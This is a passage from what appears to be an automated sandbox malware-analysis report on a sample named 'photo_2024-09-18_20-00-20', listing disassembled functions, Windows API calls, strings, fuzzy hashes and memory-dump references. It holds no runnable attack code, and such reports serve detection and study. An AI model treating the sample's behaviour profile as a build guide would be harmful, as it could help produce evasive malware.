                                                                • Opcode Fuzzy Hash: b90db5fe8f3158a9f7a92971e92c8fd28e979e71d218d5a425285b5a33b2bfc8
                                                                • Instruction Fuzzy Hash: A45168B5A40302AFC310EF59EC56A5F7BE2F715714F00462AEA11873A1D37A5B00DBDA
                                                                Function 0044A440 Relevance: 12.1, APIs: 8, Instructions: 79networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CleanupStartup_memmove_memset_strlengethostbynamegethostnameinet_ntoa
                                                                • String ID:
                                                                • API String ID: 902581304-0
                                                                • Opcode ID: c8c48751e60fb0ee6b0cca8c8933580e326d24b9396e4fdbd1910b44247a5a14
                                                                • Instruction ID: 2c2373493326f30eb0ea65171a0737ad3f5fc70b1877af9b75741d658411c6cd
                                                                • Opcode Fuzzy Hash: c8c48751e60fb0ee6b0cca8c8933580e326d24b9396e4fdbd1910b44247a5a14
                                                                • Instruction Fuzzy Hash: C121A771A00218AFD710EF54EC85AAEB7B8FB45704F00056EE91697641DB789A448F61
                                                                Function 0048B52F Relevance: 12.1, APIs: 8, Instructions: 63threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ___set_flsgetvalue.LIBCMT ref: 0048B554
                                                                • __calloc_crt.LIBCMT ref: 0048B560
                                                                • __getptd.LIBCMT ref: 0048B56D
                                                                • __initptd.LIBCMT ref: 0048B576
                                                                • CreateThread.KERNEL32(00000000,?,0048B4CA,00000000,00000000,004082CD), ref: 0048B5A4
                                                                • GetLastError.KERNEL32(?,004082CD,00000000,00000000,004084A5,?,00000000,?), ref: 0048B5AE
                                                                • _free.LIBCMT ref: 0048B5B7
                                                                • __dosmaperr.LIBCMT ref: 0048B5C2
                                                                  • Part of subcall function 0048DC90: __getptd_noexit.LIBCMT ref: 0048DC90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit__initptd_free
                                                                • String ID:
                                                                • API String ID: 73303432-0
                                                                • Opcode ID: 4dd27037dc4596eef50268ff41816d0cc1ac1756bfc18f42ffa5f048047bbce8
                                                                • Instruction ID: bfd0eadd151673bffd5585ceafdb3941aced248240ec376ec938b861a84ace8c
                                                                • Opcode Fuzzy Hash: 4dd27037dc4596eef50268ff41816d0cc1ac1756bfc18f42ffa5f048047bbce8
                                                                • Instruction Fuzzy Hash: 36114872100706BFDB12BFA5EC0299F3BD9EF55338B11482FF90486282DB78C80187A8
                                                                Function 004126AC Relevance: 12.1, APIs: 8, Instructions: 59windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemMetrics.USER32(0000000C), ref: 004126C3
                                                                • GetSystemMetrics.USER32(0000000B), ref: 004126CE
                                                                • LoadImageW.USER32(00000000,00000065,00000001,-0000000F), ref: 004126E2
                                                                • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004126F8
                                                                • GetSystemMetrics.USER32(0000000C), ref: 00412706
                                                                • GetSystemMetrics.USER32(0000000B), ref: 00412711
                                                                • LoadImageW.USER32(?,00000065,00000001,-0000000F), ref: 00412721
                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00412731
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$ImageLoadMessageSend
                                                                • String ID:
                                                                • API String ID: 530543073-0
                                                                • Opcode ID: c3a80f99e5868e07e6dba7228955014a1427b4de5879312f0a1f908b6bff00fd
                                                                • Instruction ID: 0c3d876efdc9a6d417a302d9d5cf582337c7ab7fefa1da2d16138e726c97955f
                                                                • Opcode Fuzzy Hash: c3a80f99e5868e07e6dba7228955014a1427b4de5879312f0a1f908b6bff00fd
                                                                • Instruction Fuzzy Hash: 66015EB36806047BE7109768CC83F9A76ADEF55B24F194211F324EF2E1D6E1F9405AA4
                                                                Function 00415EBD Relevance: 12.1, APIs: 8, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00415EC0
                                                                • _wcslen.LIBCMT ref: 00415EC8
                                                                • _malloc.LIBCMT ref: 00415EE6
                                                                  • Part of subcall function 0048DDE5: __FF_MSGBANNER.LIBCMT ref: 0048DDFE
                                                                  • Part of subcall function 0048DDE5: __NMSG_WRITE.LIBCMT ref: 0048DE05
                                                                  • Part of subcall function 0048DDE5: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,0048A397,?), ref: 0048DE2A
                                                                • _wcscpy.LIBCMT ref: 00415EEF
                                                                • _wcscat.LIBCMT ref: 00415EF7
                                                                • _wcscat.LIBCMT ref: 00415F0B
                                                                • _free.LIBCMT ref: 00415F1C
                                                                • _wcscat.LIBCMT ref: 00415F26
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcscat$_wcslen$AllocateHeap_free_malloc_wcscpy
                                                                • String ID:
                                                                • API String ID: 3373672540-0
                                                                • Opcode ID: 12b699578ffcc77f5d05952d5436a1dbe23453fd94208f72b49a77a7732d56d5
                                                                • Instruction ID: fc946a847b62633b715b348956bd5cc8a98febfbb426f8f10f5abef307f85368
                                                                • Opcode Fuzzy Hash: 12b699578ffcc77f5d05952d5436a1dbe23453fd94208f72b49a77a7732d56d5
                                                                • Instruction Fuzzy Hash: 74F036B25042006ED6257B2BAC4AC5F7BDEDED435C3680C1FF1C5C7186EA3A98818729
                                                                Function 00425ACB Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 222COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharNextW.USER32(?,?,00000002,0000003C,?,004259AE,00000002,?), ref: 00425CEB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CharNext
                                                                • String ID: Error parsing element name$Expected end-tag start$Expected start tag$Expected start-tag closing$Unmatched closing tag
                                                                • API String ID: 3213498283-2540963027
                                                                • Opcode ID: 477a2d77e31265d147b1c4a74ed9ebc74720178beb7f311036dc32e41b22326d
                                                                • Instruction ID: c218394ec0695bf6cdd42f2b595a69fa57a183b9fa87057d999b575ae388842d
                                                                • Opcode Fuzzy Hash: 477a2d77e31265d147b1c4a74ed9ebc74720178beb7f311036dc32e41b22326d
                                                                • Instruction Fuzzy Hash: E581F031A10A25DFCB20EF69E449A7AB7F0FF04314BA5C45BE8419B351E3789D41CB98
                                                                Function 00459BE0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeCriticalSection.KERNEL32(00632228,?,?,?,00000001,00000000,3D09168B,?,?,00000000), ref: 00459CCA
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 00459CFD
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 00459D2C
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 00459DB2
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 00459DEB
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 00459E1F
                                                                Strings
                                                                • util\ProtoValueJsonConvertor.cpp, xrefs: 00459D6D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                • String ID: util\ProtoValueJsonConvertor.cpp
                                                                • API String ID: 3991485460-1093228576
                                                                • Opcode ID: a3093efc705febfbb9471d37a0be20564aad8b8404ac5fcc566dcfa1a0d929c5
                                                                • Instruction ID: cd2f5ae6efa5fee67becc8769af17e5a43b4e68eef5a02dd7eb3a6e62394e625
                                                                • Opcode Fuzzy Hash: a3093efc705febfbb9471d37a0be20564aad8b8404ac5fcc566dcfa1a0d929c5
                                                                • Instruction Fuzzy Hash: BD816871D00346DBDB00EFA4DD42B9EBBB1BB15304F00466EE916632D2D7795B48CBA6
                                                                Function 00419F02 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Rect
                                                                • String ID: menu
                                                                • API String ID: 400858303-2097494675
                                                                • Opcode ID: a2a9fdcb90fff4f91e66e7b03e5c22741007df63681e6aa8685e2b8df0fdbd0e
                                                                • Instruction ID: 0048bfe08fa1e7ff6b2251f9c48e80c3c7b5939d3d476bce808e38799bc54e57
                                                                • Opcode Fuzzy Hash: a2a9fdcb90fff4f91e66e7b03e5c22741007df63681e6aa8685e2b8df0fdbd0e
                                                                • Instruction Fuzzy Hash: DD719030201601EBDB258F24C458BEABBE5BF19305F14495EE196C7391CB39ACA6CB5A
                                                                Function 00450110 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 149COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • _wcslen.LIBCMT ref: 00450184
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _malloc_wcslen
                                                                • String ID: client_type$event_id$event_label$stats_col$zm_install
                                                                • API String ID: 2169033462-2583610852
                                                                • Opcode ID: 55a62bf5204886ddf0a8e88361637898db9c06cd36efc0dc62dbd973bee016d2
                                                                • Instruction ID: b917ded76036908da27313906314e19b139e8dbbc9f22bdf9dfad4d35b075259
                                                                • Opcode Fuzzy Hash: 55a62bf5204886ddf0a8e88361637898db9c06cd36efc0dc62dbd973bee016d2
                                                                • Instruction Fuzzy Hash: 6B5104B55087818FC314DF1AC09195BFBE4BF98714F808A2EB8D693751DB78E908CB96
                                                                Function 00450BF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00450C12
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890BA
                                                                  • Part of subcall function 004890A5: __CxxThrowException@8.LIBCMT ref: 004890CF
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890E0
                                                                • _memmove.LIBCMT ref: 00450C7B
                                                                • _memmove.LIBCMT ref: 00450C9F
                                                                • _memmove.LIBCMT ref: 00450CD9
                                                                • _memmove.LIBCMT ref: 00450CF5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                • String ID: deque<T> too long
                                                                • API String ID: 4034224661-309773918
                                                                • Opcode ID: f341399ecd64a9283920471db0b9564304b4c59ad7aa0bf0d84db10268f30393
                                                                • Instruction ID: 4c0b01b2817007ebf5eada574d23b8b0759c90ccd3491bd34183b213cb068a26
                                                                • Opcode Fuzzy Hash: f341399ecd64a9283920471db0b9564304b4c59ad7aa0bf0d84db10268f30393
                                                                • Instruction Fuzzy Hash: A141B371E001149BDF18DE68CC816BFB7F6AFC0314B19866EDC09A7306EA78EE058795
                                                                Function 02478934 Relevance: 10.6, APIs: 7, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 02478999
                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 024789AD
                                                                • __fassign.LIBCMT ref: 02478960
                                                                  • Part of subcall function 0247B61F: __mbsnbcpy_l.LIBCMT ref: 0247B62F
                                                                • __fassign.LIBCMT ref: 02478A18
                                                                • __fassign.LIBCMT ref: 02478A47
                                                                • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 02478A5A
                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 02478A6E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                                                • String ID:
                                                                • API String ID: 2854908881-0
                                                                • Opcode ID: 0a715cbe34787b2e9f36418230d07e4bf11dab0244b1084351868e477426a86a
                                                                • Instruction ID: bd936ed444d53fcbdb14bf967a5f201e8b0d01409e58e11fc6d16f1206c49f34
                                                                • Opcode Fuzzy Hash: 0a715cbe34787b2e9f36418230d07e4bf11dab0244b1084351868e477426a86a
                                                                • Instruction Fuzzy Hash: AA41F9B15042489ADF20DB788C8CBEB7BAD9F55304F5441E6EAB8D3281DB708A4CDB51
                                                                Function 0247E384 Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(100179E4,?,0247BA97,1001C1E0,00000008,0247BC2B,?,?,?,1001C200,0000000C,0247BCE6,?), ref: 0247E38C
                                                                • __mtterm.LIBCMT ref: 0247E398
                                                                  • Part of subcall function 0247E063: RtlDecodePointer.NTDLL(1001F9BC), ref: 0247E074
                                                                  • Part of subcall function 0247E063: TlsFree.KERNEL32(1001F9C0,0247BB5A,0247BB40,1001C1E0,00000008,0247BC2B,?,?,?,1001C200,0000000C,0247BCE6,?), ref: 0247E08E
                                                                  • Part of subcall function 0247E063: _free.LIBCMT ref: 0247EE86
                                                                • TlsAlloc.KERNEL32(?,?,0247BA97,1001C1E0,00000008,0247BC2B,?,?,?,1001C200,0000000C,0247BCE6,?), ref: 0247E425
                                                                • __init_pointers.LIBCMT ref: 0247E44A
                                                                • __calloc_crt.LIBCMT ref: 0247E4B8
                                                                • GetCurrentThreadId.KERNEL32 ref: 0247E4E4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                                                • String ID:
                                                                • API String ID: 347030822-0
                                                                • Opcode ID: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                                                • Instruction ID: 5d761d36885eacbb36c6427ae452c46c1ad8022fc2e8435c4d08fde5ea73d318
                                                                • Opcode Fuzzy Hash: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                                                • Instruction Fuzzy Hash: D2313E31A00730AFE711EF758C886973EB6FB48764B24466FF855D7261EB3594428F90
                                                                Function 1000E380 Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(100179E4,?,1000BA93,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E388
                                                                • __mtterm.LIBCMT ref: 1000E394
                                                                  • Part of subcall function 1000E05F: RtlDecodePointer.NTDLL(1001F9BC), ref: 1000E070
                                                                  • Part of subcall function 1000E05F: TlsFree.KERNEL32(1001F9C0,1000BB56,1000BB3C,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E08A
                                                                  • Part of subcall function 1000E05F: _free.LIBCMT ref: 1000EE82
                                                                • TlsAlloc.KERNEL32(?,?,1000BA93,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E421
                                                                • __init_pointers.LIBCMT ref: 1000E446
                                                                • __calloc_crt.LIBCMT ref: 1000E4B4
                                                                • GetCurrentThreadId.KERNEL32 ref: 1000E4E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                                                • String ID:
                                                                • API String ID: 347030822-0
                                                                • Opcode ID: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                                                • Instruction ID: dfa6302f412d44b18f04af5178cbb3b887102783623a010561f8bc2fa93634a2
                                                                • Opcode Fuzzy Hash: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                                                • Instruction Fuzzy Hash: BC315E31901BB1AFF751DF748C8861B3EA2FB443A0B20462AF844E7276DB749842CF50
